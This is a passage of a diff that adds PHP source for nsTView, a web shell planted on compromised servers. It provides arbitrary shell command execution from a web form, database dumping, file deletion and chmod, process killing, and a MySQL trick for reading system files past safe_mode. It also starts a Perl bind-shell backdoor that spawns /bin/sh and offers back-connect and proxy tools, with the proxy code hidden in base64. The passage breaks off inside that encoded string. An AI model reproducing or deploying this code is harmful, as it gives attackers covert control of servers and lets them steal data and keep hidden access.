+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
+}#end of mk ins
+}#end of ins new line
+
+
+
+
+
+
+if(isset($_GET['rename_table'])){
+$rename_table=$_GET['rename_table'];
+print "<br><br>Rename <b>$rename_table</b> to<br><br>
+<form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$rename_table'>
+<input name=new_name size=30><center><br>
+<input type=submit value=Rename></center>
+</form>
+";
+
+if(isset($_POST['new_name'])){
+mysql_select_db($db) or die("<font color=red>".mysql_error()."</font>");
+mysql_query("RENAME TABLE $rename_table TO ".$_POST['new_name']) or die("<font color=red>".mysql_error()."</font>");
+print "<br><font color=green>Table <b>$rename_table</b> renamed to <b>".$_POST['new_name']."</b></font>";
+print "<meta http-equiv=\"REFRESH\" content=\"2;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&db=$db\">";
+}
+
+}#end of rename
+
+
+# dump table
+if($_GET['dump']){
+if(!is_writable($f_d)){die("<br><br><font color=red>This folder $f_d isnt writable!<br>Cannot make dump.<br><br>
+<font color=green><b>You can change temp folder for dump file in your browser!<br>
+<font color=red>Change variable &f_d=(here writable directory, expl: /tmp or c:/windows/temp)</font><br>
+Then press enter</b></font>
+</font>");}
+mysql_select_db($db) or die("<font color=red>".mysql_error()."</font>");
+$fp = fopen($f_d."/".$f,"w");
+fwrite($fp, "# nsTView.php v$ver
+# Web: http://nst.void.ru
+# Dump from: ".$_SERVER["SERVER_NAME"]." (".$_SERVER["SERVER_ADDR"].")
+# MySQL version: ".mysql_get_server_info()."
+# PHP version: ".phpversion()."
+# Date: ".date("d.m.Y - H:i:s")."
+# Dump db ( $db ) Table ( $tbl )
+# --- eof ---
+
+");
+$que = mysql_query("SHOW CREATE TABLE `$tbl`") or die("<font color=red>".mysql_error()."</font>");
+$row = mysql_fetch_row($que);
+fwrite($fp, "DROP TABLE IF EXISTS `$tbl`;\r\n");
+$row[1]=str_replace("\n","\r\n",$row[1]);
+fwrite($fp, $row[1].";\r\n\r\n");
+$que = mysql_query("SELECT * FROM `$tbl`");
+if(mysql_num_rows($que)>0){
+while($row = mysql_fetch_assoc($que)){
+$keys = join("`, `", array_keys($row));
+$values = array_values($row);
+foreach($values as $k=>$v) {$values[$k] = adds2($v);}
+$values = implode("', '", $values);
+$sql = "INSERT INTO `$tbl`(`$keys`) VALUES ('".$values."');\r\n";
+fwrite($fp, $sql);
+}
+}
+fclose($fp);
+print "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&dump_download=1&f_d=$f_d/\">";
+}#end of dump
+
+
+
+
+# db dump
+if($_GET['dump_db']){
+$c=mysql_num_rows(mysql_list_tables($db));
+if($c>=1){
+print "<br><br>&nbsp;&nbsp;&nbsp;Dump database <b>$db</b>";
+}else{
+print "<br><br><font color=red>Cannot dump database. No tables exists in <b>$db</b> db.</font>";
+die;
+}
+if(sizeof($tabs)==0){
+$res = mysql_query("SHOW TABLES FROM $db");
+if(mysql_num_rows($res)>0){
+while($row=mysql_fetch_row($res)){
+$tabs[] .= $row[0];
+}
+}
+}
+$fp = fopen($f_d."/".$f,"w");
+fwrite($fp, "# nsTView.php v$ver
+# Web: http://nst.void.ru
+# Dump from: ".$_SERVER["SERVER_NAME"]." (".$_SERVER["SERVER_ADDR"].")
+# MySQL version: ".mysql_get_server_info()."
+# PHP version: ".phpversion()."
+# Date: ".date("d.m.Y - H:i:s")."
+# Dump db ( $db )
+# --- eof ---
+
+");
+foreach($tabs as $tab) {
+fwrite($fp,"DROP TABLE IF EXISTS `$tab`;\r\n");
+$res = mysql_query("SHOW CREATE TABLE `$tab`");
+$row = mysql_fetch_row($res);
+$row[1]=str_replace("\n","\r\n",$row[1]);
+fwrite($fp, $row[1].";\r\n\r\n");
+$res = mysql_query("SELECT * FROM `$tab`");
+if(mysql_num_rows($res)>0){
+while($row=mysql_fetch_assoc($res)){
+$keys = join("`, `", array_keys($row));
+$values = array_values($row);
+foreach($values as $k=>$v) {$values[$k] = adds2($v);}
+$values = join("', '", $values);
+$sql = "INSERT INTO `$tab`(`$keys`) VALUES ('$values');\r\n";
+fwrite($fp, $sql);
+}}
+fwrite($fp, "\r\n\r\n\r\n");
+}
+fclose($fp);
+print "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&dump_download=1&f_d=$f_d/\">";
+}#end of db dump
+
+
+
+
+
+
+$vnutr=$_GET['vnutr'];
+$tbl=$_GET['tbl'];
+if($vnutr and !$_GET['ins_new_line']){
+print "<table cellpadding=0 cellspacing=1><tr><td>";
+
+mysql_select_db($db) or die(mysql_error());
+$c=mysql_query ("SELECT COUNT(*) FROM $tbl");
+$cfa=mysql_fetch_array($c);
+mysql_free_result($c);
+print "
+Total: $cfa[0]
+<form>
+From: <input name=from size=3 value=0>
+To: <input name=to size=3 value='$cfa[0]'>
+<input type=submit name=show value=Show>
+<input type=hidden name=vnutr value=1>
+<input type=hidden name=vn value='$vn'>
+<input type=hidden name=db value='$db'>
+<input type=hidden name=login value='$login'>
+<input type=hidden name=pass value='$pass'>
+<input type=hidden name=adress value='$adress'>
+<input type=hidden name=conn value=1>
+<input type=hidden name=baza value=1>
+<input type=hidden name=p value=sql>
+<input type=hidden name=tbl value='$tbl'>
+ [<a href='$php_self?getdb=1&to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl'>DOWNLOAD</a>] [<a href='$php_self?to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl&ins_new_line=1'>INSERT</a>] [<a href='$php_self?to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl&dump=1&f_d=$d'>DUMP</a>]
+</form></td></tr></table>";
+$vn=$_GET['vn'];
+$from=$_GET['from'];
+$to=$_GET['to'];
+$from=$_GET['from'];
+$to=$_GET['to'];
+if(!isset($from)){$from=0;}
+if(!isset($to)){$to=50;}
+$query = "SELECT * FROM $vn LIMIT $from,$to";
+$result = mysql_query($query);
+$result1= mysql_query($query);
+print $del_result;
+print "<table cellpadding=0 cellspacing=1 border=1><tr><td></td>";
+for ($i=0;$i<mysql_num_fields($result);$i++){
+$name=mysql_field_name($result,$i);
+$type  = mysql_field_type($result, $i);
+$len  = mysql_field_len($result, $i);
+print "<td bgcolor=#BCE0FF> $name (<b>$type($len)</b>)</td>";
+}
+print "</tr><pre>";
+
+while($mn = mysql_fetch_array($result, MYSQL_ASSOC)){
+foreach($mn as $key=>$inside){
+$buffer1 .= "`$key`='".adds($inside)."' AND ";
+$b1 .= "<td>".htmlspecialchars($inside, ENT_NOQUOTES)."&nbsp;</td>";
+}
+$buffer1  = substr($buffer1, 0, strlen($buffer1)-5);
+$buffer1  = base64_encode($buffer1);
+print "<td>
+<form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$tbl&vnutr=1&baza=1&vn=$vn&db=$db'>
+<input type=hidden name=delete_row value='$buffer1'>
+<input type=submit value=Del onclick='return confirm(\"DELETE ?\")' style='border:1px; background-color:white;'>
+</form><form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$tbl&baza=1&vn=$vn&db=$db'>
+<input type=hidden name=edit_row value='$buffer1'>
+<input type=submit value=Edit style='border:1px;background-color:green;'>
+</form>
+</td>\r\n";
+print $b1;
+print "</tr>";
+unset($b1);
+unset($buffer1);
+}
+
+
+
+mysql_free_result($result);
+print "</table>";
+} #end vnutr
+print "</td></tr></table>";
+} # end $conn
+
+
+###   end of sql
+print "</tr></td></table> </td></tr></table>";
+print $copyr;
+die;
+}
+
+
+@$p=$_GET['p'];
+if(@$_GET['p']=="selfremover"){
+        print "<tr><td>";
+print "<font color=red face=verdana size=1>Are you sure?<br>
+<a href='$php_self?p=yes'>Yes</a> | <a href='$php_self?'>No</a><br>
+Remove: <u>";
+$path=__FILE__;
+print $path;
+print " </u>?</td></tr></table>";
+die;
+}
+
+if($p=="yes"){
+$path=__FILE__;
+@unlink($path);
+$path=str_replace("\\","/",$path);
+if(file_exists($path)){$hmm="NOT DELETED!!!";
+print "<tr><td><font color=red>FILE $path NOT DELETED</td></tr>";
+}else{$hmm="DELETED";}
+print "<script>alert('$path $hmm');</script>";
+
+}
+
+
+
+if($os=="unix"){
+function fastcmd(){
+global $fast_commands;
+$c_f=explode("\n",$fast_commands);
+$c_f=count($c_f)-2;
+print "
+<form method=post>
+Total commands: $c_f<br>
+<select name=sh>";
+
+$c=substr_count($fast_commands," (nst) ");
+for($i=0; $i<=$c; $i++){
+       $expl2=explode("\r\n",$fast_commands);
+        $expl=explode(" (nst) ",$expl2[$i]);
+        if(trim($expl[1])!=""){
+        print "<option value='".trim($expl[1])."'>$expl[0]</option>\r\n";
+   }
+}
+
+print "</select><br>
+<input type=submit value=Exec>
+</form>
+";
+}
+}#end of os unix
+
+
+if($os=="win"){
+function fastcmd(){
+global $fast_commands_win;
+$c_f=explode("\n",$fast_commands_win);
+$c_f=count($c_f)-2;
+print "
+<form method=post>
+Total commands: $c_f<br>
+<select name=sh>";
+
+$c=substr_count($fast_commands_win," (nst) ");
+for($i=0; $i<=$c; $i++){
+       $expl2=explode("\r\n",$fast_commands_win);
+        $expl=explode(" (nst) ",$expl2[$i]);
+        if(trim($expl[1])!=""){
+        print "<option value='".trim($expl[1])."'>$expl[0]</option>\r\n";
+   }
+}
+
+print "</select><br>
+<input type=submit value=Exec>
+</form>
+";
+}
+}#end of os win
+
+
+echo "
+<tr><td>";
+if(@$_GET['shell']=="1"){echo "<center>cmd<br>pwd:
+";
+chdir($d);
+echo getcwd()."<br><br>
+Fast cmd:<br>";
+fastcmd();
+if($os=="win"){$d=str_replace("/","\\\\",$d);}
+print "
+<a href=\"javascript:cwd('$d ')\">Insert pwd</a>
+<form name=shellForm method=post><input name=sh size=110></form></center><br>
+";
+if(@$_POST['sh']){
+$sh=$_POST['sh'];
+echo "<pre>";
+print `$sh`; echo "</pre>";}
+}
+
+if(@$_GET['shell']=="2"){
+echo "<center>cmd<br>
+pwd:
+";
+chdir($d);
+echo getcwd()."<br><br>
+Fast cmd:<br>";
+fastcmd();
+if($os=="win"){$d=str_replace("/","\\\\",$d);}
+print "
+<a href=\"javascript:cwd('$d ')\">Insert pwd</a>
+<form name=shellForm method=post><input name=sh size=110></form></center><br>";
+if(@$_POST['sh']){
+$sh=$_POST['sh'];
+echo "<pre>"; print `$sh`; echo "</pre>";}
+echo $copyr;
+exit;}
+
+if(@$_GET['delfl']){
+@$delfolder=$_GET['delfolder'];
+echo "DELETE FOLDER: <font color=red>".@$_GET['delfolder']."</font><br>
+(All files must be writable)<br>
+<a href='$php_self?deldir=1&dir=".@$delfolder."&rback=".@$_GET['rback']."'>Yes</a> || <a href='$php_self?d=$d'>No</a><br><br>
+";
+echo $copyr;
+exit;
+}
+
+
+$mkdir=$_GET['mkdir'];
+if($mkdir){
+print "<br><b>Create Folder in $d :</b><br><br>
+<form method=post>
+New folder name:<br>
+<input name=dir_n size=30>
+</form><br>
+";
+if($_POST['dir_n']){
+mkdir($d."/".$_POST['dir_n']) or die('Cannot create directory '.$_POST['dir_n']);
+print "<b><font color=green>Directory created success!</font></b>";
+}
+print $copyr;
+die;
+}
+
+
+$mkfile=$_GET['mkfile'];
+if($mkfile){
+print "<br><b>Create file in $d :</b><br><br>
+<form method=post>
+File name:<br>
+(example: hello.txt , hello.php)<br>
+<input name=file_n size=30>
+</form><br>
+";
+if($_POST['file_n']){
+$fp=fopen($d."/".$_POST['file_n'],"w") or die('Cannot create file '.$_POST['file_n']);
+fwrite($fp,"");
+print "<b><font color=green>File created success!</font></b>";
+}
+print $copyr;
+die;
+}
+
+
+$ps_table=$_GET['ps_table'];
+if($ps_table){
+
+if($_POST['kill_p']){
+exec("kill -9 ".$_POST['kill_p']);
+}
+
+$str=`ps aux`;
+preg_match_all("/(?:.*?)([0-9]{1,7})(.*?)\s\s\s[0-9]:[0-9][0-9]\s(.*)/i",$str,$matches);
+print "<br><b>PS Table :: Fast kill program<br><br></b>";
+print "<center><table border=1>";
+for($i=0; $i<count($matches[3]); $i++){
+$expl=explode(" ",$matches[0][$i]);
+print "<tr><td>$expl[0]</td><td>PID: ".$matches[1][$i]." :: ".$matches[3][$i]."</td><form method=post><td><font color=red>Kill: <input type=submit name=kill_p value=".trim($matches[1][$i])."></td></form></tr>";
+}#end of for
+print "</table></center><br><br>";
+unset($str);
+print $copyr;
+die;
+}#end of ps table
+
+
+$read_file_safe_mode=$_GET['read_file_safe_mode'];
+if($read_file_safe_mode){
+
+if(!isset($_POST['l'])){$_POST['l']="root";}
+
+print "<br>
+Read file content using MySQL - when <b>safe_mode</b>, <b>open_basedir</b> is <font color=green>ON</font><Br>
+<form method=post>
+<table>
+<tr><td>Addr:</td><Td> <input name=serv_ip value='127.0.0.1'><input name=port value='3306' size=6></td></tr>
+<tr><td>Login:</td><td><input name=l value=".$_POST['l']."></td></tr>
+<tr><td>Passw:</td><td><input name=p value=".$_POST['p']."></td></tr></table>
+(example: /etc/hosts)<br>
+<input name=read_file size=45><br>
+<input type=submit value='Show content'>
+</form>
+<br>";
+
+if($_POST['read_file']){
+$read_file=$_POST['read_file'];
+@mysql_connect($_POST['serv_ip'].":".$_POST['port'],$_POST['l'],$_POST['p']) or die("<font color=red>".mysql_error()."</font>");
+mysql_create_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>");
+mysql_select_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>");
+mysql_query('CREATE TABLE `tmp_file` ( `file` LONGBLOB NOT NULL );') or die("<font color=red>".mysql_error()."</font>");
+mysql_query("LOAD DATA INFILE \"".addslashes($read_file)."\" INTO TABLE tmp_file");
+$query = "SELECT * FROM tmp_file";
+$result = mysql_query($query) or die("<font color=red>".mysql_error()."</font>");
+print "<b>File content</b>:<br><br>";
+for($i=0;$i<mysql_num_fields($result);$i++){
+$name=mysql_field_name($result,$i);}
+while($line=mysql_fetch_array($result, MYSQL_ASSOC)){
+foreach ($line as $key =>$col_value) {
+print htmlspecialchars($col_value)."<br>";}}
+mysql_free_result($result);
+mysql_drop_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>");
+}
+
+
+print $copyr;
+die;
+}#end of read_file_safe_mode
+
+
+# sys
+$wich_f=$_GET['wich_f'];
+$delete=$_GET['delete'];
+$del_f=$_GET['del_f'];
+$chmod=$_GET['chmod'];
+$ccopy_to=$_GET['ccopy_to'];
+
+
+# delete
+if(@$_GET['del_f']){
+if(!isset($delete)){
+print "<font color=red>Delete this file?</font><br>
+<b>$d/$wich_f<br><br></b>
+<a href='$php_self?d=$d&del_f=$wich_f&delete=1'>Yes</a> / <a href='$php_self?d=$d'>No</a>
+";}
+if($delete==1){
+unlink($d."/".$del_f);
+print "<b>File: <font color=green>$d/$del_f DELETED!</font></b>
+<br><b> <a href='$php_self?d=$d'># BACK</a>
+";
+}
+echo $copyr;
+exit;
+}
+
+
+# copy to
+if($ccopy_to){
+$wich_f=$_POST['wich_f'];
+$to_f=$_POST['to_f'];
+print "<font color=green>Copy file:<br>
+$d/$ccopy_to</font><br>
+<br>
+<form method=post>
+File:<br><input name=wich_f size=100 value='$d/$ccopy_to'><br><br>
+To:<br><input name=to_f size=100 value='$d/nst_$ccopy_to'><br><br>
+<input type=submit value=Copy></form><br><br>
+";
+
+if($to_f){
+@copy($wich_f,$to_f) or die("<font color=red>Cannot copy!!! maybe folder is not writable</font>");
+print "<font color=green><b>Copy success!!!</b></font><br>";
+}
+
+echo $copyr;
+exit;
+}
+
+
+# chmod
+if(@$_GET['chmod']){
+$perms = @fileperms($d."/".$wich_f);
+print "<b><font color=green>CHMOD file $d/$wich_f</font><br>
+<br><center>This file chmod is</b> ";
+print perm($perms);
+print "</center>
+<br>";
+$chmd=<<<HTML
+
+<script>
+<!--
+
+function do_chmod(user) {
+        var field4 = user + "4";
+        var field2 = user + "2";
+        var field1 = user + "1";
+        var total = "t_" + user;
+        var symbolic = "sym_" + user;
+        var number = 0;
+        var sym_string = "";
+
+        if (document.chmod[field4].checked == true) { number += 4; }
+        if (document.chmod[field2].checked == true) { number += 2; }
+        if (document.chmod[field1].checked == true) { number += 1; }
+
+        if (document.chmod[field4].checked == true) {
+                sym_string += "r";
+        } else {
+                sym_string += "-";
+        }
+        if (document.chmod[field2].checked == true) {
+                sym_string += "w";
+        } else {
+                sym_string += "-";
+        }
+        if (document.chmod[field1].checked == true) {
+                sym_string += "x";
+        } else {
+                sym_string += "-";
+        }
+
+        if (number == 0) { number = ""; }
+        document.chmod[total].value = number;
+        document.chmod[symbolic].value = sym_string;
+
+        document.chmod.t_total.value = document.chmod.t_owner.value + document.chmod.t_group.value + document.chmod.t_other.value;
+        document.chmod.sym_total.value = "-" + document.chmod.sym_owner.value + document.chmod.sym_group.value + document.chmod.sym_other.value;
+}
+//-->
+</script>
+
+
+
+<form name="chmod" method=post>
+<p><table cellpadding="0" cellspacing="0" border="0" bgcolor="silver"><tr><td width="100%" valign="top"><table width="100%" cellpadding="5" cellspacing="2" border="0"><tr><td width="100%" bgcolor="#008000" align="center" colspan="5"><font color="#ffffff" size="3"><b>CHMOD (File Permissions)</b></font></td></tr>
+        <tr bgcolor="gray">
+                <td align="left"><b>Permission</b></td>
+                <td align="center"><b>Owner</b></td>
+                <td align="center"><b>Group</b></td>
+                <td align="center"><b>Other</b></td>
+                <td bgcolor="#dddddd" rowspan="4"> </td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="left" nowrap><b>Read</b></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner4" value="4" onclick="do_chmod('owner')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="group4" value="4" onclick="do_chmod('group')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="other4" value="4" onclick="do_chmod('other')"></td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="left" nowrap><b>Write</b></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner2" value="2" onclick="do_chmod('owner')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="group2" value="2" onclick="do_chmod('group')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="other2" value="2" onclick="do_chmod('other')"></td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="left" nowrap><b>Execute</b></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner1" value="1" onclick="do_chmod('owner')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="group1" value="1" onclick="do_chmod('group')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="other1" value="1" onclick="do_chmod('other')"></td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="right" nowrap>Octal:</td>
+                <td align="center"><input type="text" name="t_owner" value="" size="1"></td>
+                <td align="center"><input type="text" name="t_group" value="" size="1"></td>
+                <td align="center"><input type="text" name="t_other" value="" size="1"></td>
+                <td align="left"><b>=</b> <input type="text" name="t_total" value="777" size="3"></td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="right" nowrap>Symbolic:</td>
+                <td align="center"><input type="text" name="sym_owner" value="" size="3"></td>
+                <td align="center"><input type="text" name="sym_group" value="" size="3"></td>
+                <td align="center"><input type="text" name="sym_other" value="" size="3"></td>
+                <td align="left" width=100><b>=</b> <input type="text" name="sym_total" value="" size="10"></td>
+        </tr>
+</table></td></tr></table></p>
+HTML;
+
+print "<center>".$chmd."
+
+<b>$d/$wich_f</b><br><br>
+<input type=submit value=CHMOD></form>
+</center>
+</form>
+";
+$t_total=$_POST['t_total'];
+if($t_total){
+chmod($d."/".$wich_f,$t_total);
+print "<center><font color=green><br><b>Now chmod is $t_total</b><br><br></font>";
+print "<a href='$php_self?d=$d'># BACK</a><br><br>";
+}
+echo $copyr;
+exit;
+}
+
+# rename
+if(@$_GET['rename']){
+print "<b><font color=green>RENAME $d/$wich_f ?</b></font><br><br>
+<center>
+<form method=post>
+<b>RENAME</b><br><u>$wich_f</u><br><Br><B>TO</B><br>
+<input name=rto size=40 value='$wich_f'><br><br>
+<input type=submit value=RENAME>
+</form>
+";
+
+@$rto=$_POST['rto'];
+
+if($rto){
+$fr1=$d."/".$wich_f;
+$fr1=str_replace("//","/",$fr1);
+$to1=$d."/".$rto;
+$to1=str_replace("//","/",$to1);
+
+rename($fr1,$to1);
+print "File <br><b>$wich_f</b><br>Renamed to <b>$rto</b><br><br>";
+
+echo "<meta http-equiv=\"REFRESH\" content=\"3;URL=".$php_self."?d=".$d."&rename=1&wich_f=".$rto."\">";
+
+}
+
+echo $copyr;
+exit;
+}
+
+
+
+
+if(@$_GET['deldir']){
+@$dir=$_GET['dir'];
+function deldir($dir)
+{
+$handle = @opendir($dir);
+while (false!==($ff = @readdir($handle))){
+if($ff != "." && $ff != ".."){
+if(@is_dir("$dir/$ff")){
+deldir("$dir/$ff");
+}else{
+@unlink("$dir/$ff");
+}}}
+@closedir($handle);
+if(@rmdir($dir)){
+@$success = true;}
+return @$success;
+}
+$dir=@$dir;
+deldir($dir);
+
+$rback=$_GET['rback'];
+@$rback=explode("/",$rback);
+$crb=count($rback);
+for($i=0; $i<$crb-1; $i++){
+        @$x.=$rback[$i]."/";
+}
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL='$php_self?d=".@$x."'\">";
+echo $copyr;
+exit;}
+
+
+if(@$_GET['t']=="tools"){
+        # unix
+if($os=="unix"){
+print "
+<center><br>
+<font color=red><b>P.S: After you Start, your browser may stuck! You must close it, and then run nstview.php again.</b><br></font>
+<table border=1>
+<tr><td align=center><b>[Name]</td><td align=center><b>[C]</td><td align=center><b>[Port]</td><td align=center><b>[Perl]</td><td align=center><b>[Port]</td><td align=center><b>[Other options, info]</td></tr>
+<tr><form method=post><td><font color=red><b>Backdoor:</b></font></td><td><input type=submit name=c_bd value='Start' style='background-color:green;'></td><td><input name=port size=6 value=5545></td></form><form method=post><td><input type=submit name=perl_bd value='Start' style='background-color:green;'></td><td><input name=port value=5551 size=6></td><td>none</td></form></tr>
+<tr><form method=post><td><font color=red><b>Back connect:</b></font></td><td><input type=submit value='Start' name=bc_c style='background-color:green;'></td><td><input name=port_c size=6 value=5546></td><td><input type=submit value='Start' name=port_p disabled style='background-color:gray;'></td><td><input name=port value=5552 size=6></td><td>b.c. ip: <input name=ip value='".$_SERVER['REMOTE_ADDR']."'> nc -l -p <i>5546</i></td></form></tr>
+<tr><form method=post><td><font color=red><b>Datapipe:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port_1 size=6 value=5547></td><td><input type=submit value='Start' name=datapipe_pl style='background-color:green;'></td><td><input name=port_2 value=5553 size=6></td><td>other serv ip: <input name=ip> port: <input name=port_3 value=5051 size=6></td></form></tr>
+<tr><form method=post><td><font color=red><b>Web proxy:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5548></td></form><form method=post><td><input type=submit value='Start' name=perl_proxy style='background-color:green;'></td><td><input name=port size=6 value=5554></td></form><td>none</td></tr>
+<tr><form method=post><td><font color=red><b>Socks 4 serv:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5549></td></form><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5555></td><td>none</td></tr>
+<tr><form method=post><td><font color=red><b>Socks 5 serv:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5550></td></form><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5556></td><td>none</td></tr>
+</table>
+</center>
+<br><Br>
+";
+}#end of unix
+
+
+if($_POST['perl_bd']){
+$port=$_POST['port'];
+$perl_bd_scp = "
+use Socket;\$p=$port;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));
+setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);bind(S,sockaddr_in(\$p,INADDR_ANY));
+listen(S,50);while(1){accept(X,S);if(!(\$pid=fork)){if(!defined \$pid){exit(0);}
+open STDIN,\"<&X\";open STDOUT,\">&X\";open STDERR,\">&X\";exec(\"/bin/sh -i\");
+close X;}}";
+
+if(is_writable("/tmp")){
+$fp=fopen("/tmp/nst_perl_bd.pl","w");
+fwrite($fp,"$perl_bd_scp");
+passthru("perl /tmp/nst_perl_bd.pl &");
+unlink("/tmp/nst_perl_bd.pl");
+}else{
+if(is_writable(".")){
+mkdir(".nst_bd_tmp");
+$fp=fopen(".nst_bd_tmp/nst_perl_bd.pl","w");
+fwrite($fp,"$perl_bd_scp");
+passthru("perl .nst_bd_tmp/nst_perl_bd.pl &");
+unlink(".nst_bd_tmp/nst_perl_bd.pl");
+rmdir(".nst_bd_tmp");
+}
+}
+$show_ps="1";
+}#end of start perl_bd
+
+if($_POST['perl_proxy']){
+$port=$_POST['port'];
+$perl_proxy_scp = "IyEvdXNyL2Jpbi9wZXJsICANCiMhL3Vzci91c2MvcGVybC81LjAwNC9iaW4vcGVybA0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMtIGh0dHAgcHJveHkgc2VydmVyLiB6YXB1c2thamVtOiBwZXJsIHByb3h5LnBsCTgxODEgbHVib2ogcG9ydCB2aTZpIDEwMjQtDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KI3JlcXVpcmUgInN5cy9zb2NrZXQucGgiOw0KdXNlIFNvY2tldDsNCnNyYW5kICh0aW1lfHwkJCk7DQojLS0tICBEZWZpbmUgYSBmcmllbmRseSBleGl0IGhhbmRsZXINCiRTSUd7J0tJTEwnfSA9ICRTSUd7UVVJVH0gPSAkU0lHe0lOVH0gPSAnZXhpdF9oYW5kbGVyJzsNCnN1YiBleGl0X2hhbmRsZXIgew0KICAgIHByaW50ICJcblxuIC0tLSBQcm94eSBzZXJ2ZXIgaXMgZHlpbmcgLi4uXG5cbiI7DQogICAgY2xvc2UoU09DS0VUKTsNCiAgICBleGl0Ow0KDQp9DQojLS0tICBTZXR1cCBzb2NrZXQNCg0KJHwgPSAxOw0KJHByb3h5X3BvcnQgPSBzaGlmdChAQVJHVik7DQokcHJveHlfcG9ydCA9IDgxODEgdW5sZXNzICRwcm94eV9wb3J0ID1+IC9cZCsvOw0KDQokc29ja2V0X2Zvcm1hdCA9ICdTIG4gYTQgeDgnOw0KJmxpc3Rlbl90b19wb3J0KFNPQ0tFVCwgJHByb3h5X3BvcnQpOw0KJGxvY2FsX2hvc3QgPSBgaG9zdG5hbWVgOw0KY2hvcCgkbG9jYWxfaG9zdCk7DQokbG9jYWxfaG9zdF9pcCA9IChnZXRob3N0YnluYW1lKCRsb2NhbF9ob3N0KSlbNF07DQpwcmludCAiIC0tLSBQcm94eSBzZXJ2ZXIgcnVubmluZyBvbiAkbG9jYWxfaG9zdCBwb3J0OiAkcHJveHlfcG9ydCBcblxuIjsNCiMtLS0gIExvb3AgZm9yZXZlciB0YWtpbmcgcmVxdWVzdHMgYXMgdGhleSBjb21lDQp3aGlsZSAoMSkgew0KIy0tLSAgV2FpdCBmb3IgcmVxdWVzdA0KICAgIHByaW50ICIgLS0tIFdhaXRpbmcgdG8gYmUgb2Ygc2VydmljZSAuLi5cbiI7DQogICAgKCRhZGRyID0gYWNjZXB0KENISUxELFNPQ0tFVCkpIHx8IGRpZSAiYWNjZXB0ICQhIjsNCiAgICAoJHBvcnQsJGluZXRhZGRyKSA9ICh1bnBhY2soJHNvY2tldF9mb3JtYXQsJGFkZHIpKVsxLDJdOw0KICAgIEBpbmV0YWRkciA9IHVucGFjaygnQzQnLCRpbmV0YWRkcik7DQogICAgcHJpbnQgIkNvbm5lY3Rpb24gZnJvbSAiLCBqb2luKCIuIiwgQGluZXRhZGRyKSwgIiAgcG9ydDogJHBvcnQgXG4iOw0KIy0tLSAgRm9yayBhIHN1YnByb2Nlc3MgdG8gaGFuZGxlIHJlcXVlc3QuDQojLS0tICBQYXJlbnQgcHJvY2VzIGNvbnRpbnVlcyBsaXN0ZW5pbmcuDQogICAgaWYgKGZvcmspIHsNCgl3YWl0OwkJIyBGb3Igbm93IHdlIHdhaXQgZm9yIHRoZSBjaGlsZCB0byBmaW5pc2gNCgluZXh0OwkJIyBXZSB3YWl0IHNvIHRoYXQgcHJpbnRvdXRzIGRvbid0IG1peA0KICAgIH0NCiMtLS0gIFJlYWQgZmlyc3QgbGluZSBvZiByZXF1ZXN0IGFuZCBhbmFseXplIGl0Lg0KIy0tLSAgUmV0dXJuIGFuZCBlZGl0ZWQgdmVyc2lvbiBvZiB0aGUgZmlyc3QgbGluZSBhbmQgdGhlIHJlcXVlc3QgbWV0aG9kLg0KICAgKCRmaXJzdCwkbWV0aG9kKSA9ICZhbmFseXplX3JlcXVlc3Q7DQojLS0tICBTZW5kIHJlcXVlc3QgdG8gcmVtb3RlIGhvc3QNCiAgICBwcmludCBVUkwgJGZpcnN0Ow0KICAgIHBy